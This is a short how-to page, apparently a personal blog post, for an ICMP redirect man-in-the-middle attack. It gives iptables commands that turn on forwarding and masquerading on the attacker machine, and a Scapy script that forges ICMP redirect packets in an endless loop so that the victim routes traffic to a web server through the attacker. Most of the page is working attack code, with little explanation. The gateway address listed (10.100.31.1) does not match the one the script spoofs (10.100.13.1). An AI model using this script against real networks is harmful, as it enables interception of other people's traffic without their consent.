Categorie├źn
ICMP-Redirect Attack

ICMP-Redirect Attack

Enable IP forwarding and Source NAT translation for Victim subnet

#sudo echo 1 > /proc/sys/net/ipv4/ip_forward
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)
#sudo iptables -t nat -L
  • ip – gateway = 10.100.31.1
  • ip – victim = 10.100.13.126
  • ip – attacker = 10.100.13.20
  • ip- victime website = 10.23.56.100

Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
bound method IP.display of IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
bound method IP.display of IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim Ip

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>